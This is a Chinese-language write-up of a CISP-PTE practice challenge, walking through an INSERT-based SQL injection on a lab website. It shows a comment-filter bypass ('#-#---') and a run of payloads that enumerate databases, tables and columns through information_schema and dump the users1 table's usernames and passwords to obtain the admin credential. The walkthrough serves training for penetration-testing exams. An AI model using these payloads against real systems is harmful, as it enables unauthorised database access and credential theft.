CISP-PTE 练习题目-sql注入1

CISP-PTE 练习题目-sql注入1

题目地址:http://49.232.193.10:81/

CISP-PTE 练习题目-sql注入1_第1张图片
进入界面显示
CISP-PTE 练习题目-sql注入1_第2张图片
​ 尝试万能密码注入‘ or 1=1#等注入,均失败。注册个账号看看登录进内部还有什么内容

CISP-PTE 练习题目-sql注入1_第3张图片
​ 登录后发现题目提示了代码过滤规则,给出strstr()和str_replace()函数介绍
CISP-PTE 练习题目-sql注入1_第4张图片CISP-PTE 练习题目-sql注入1_第5张图片
​ 可知我们输入的sql语句会循环过滤调注释符’#‘和’–‘,并且先过滤’–‘后过滤’#‘。尝试绕过过滤,构造在这里插入图片描述末尾有空格,过滤后即为–(空格),达到注释的目的。

​ 在文章发布的地方,尝试发布内容,系统提示了注入语句。
CISP-PTE 练习题目-sql注入1_第6张图片
​ insert article1 value(‘$pagram1’, 标题,内容,用户名)

​ 尝试insert注入,我们可以选择在标题和内容的字段注入。但是在内容处注入,由于需要闭合’‘,我们所需执行的sql语句被单引号‘包裹,不能回显执行全部内容,如同 '+ascii(substr((select database()),1,1))+'此类盲注,所以选择在标题处进行注入。标题处注入,可以闭合标题,将内容作为sql语句执行结果回显,用户名后面的语句进行注释。

​ 标题处构造payload:version',(select version()),'hzj') #-#---
CISP-PTE 练习题目-sql注入1_第7张图片
​ 结果发现,系统没有过滤空格等特殊符号及大小写,我们按部就班进行查库查表查字段

​ 查当前数据库,payload:database',(select database()),'hzj') #-#---
CISP-PTE 练习题目-sql注入1_第8张图片
​ 查所有数据库, payload:schema_name',(select group_concat(schema_name) from information_schema.schemata),'hzj')#-#---
CISP-PTE 练习题目-sql注入1_第9张图片
​ 发现有数据库名为2web的可疑,查该数据库下所有表, payload:table_name',(select group_concat(table_name) from information_schema.tables where table_schema='2web'),'hzj')#-#---
CISP-PTE 练习题目-sql注入1_第10张图片
​ 发现有3个表,查询users1列名,payload:column_name',(select group_concat(column_name) from information_schema.columns where table_schema='2web' and table_name='users1'),'hzj')#-#---
CISP-PTE 练习题目-sql注入1_第11张图片
​ 发现有username,password两列,尝试爆出users1的所有数据,payload:users1',(select group_concat(username,'_',password) from users1),'hzj')#-#---
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LqEXchEf-1660381618074)(C:\Users\76436\AppData\Roaming\Typora\typora-user-images\image-20220813170108183.png)]
可能对insert插入字段字符串长度做了限制,查询长度过长,所以我们尝试查admin的password,payload:users1',(select group_concat(username,'_',password) from users1 where username='admin'),'hzj')#-#---
CISP-PTE 练习题目-sql注入1_第12张图片
​ 拿到key1。

你可能感兴趣的:(cisp-pte练习,sql,数据库,web安全)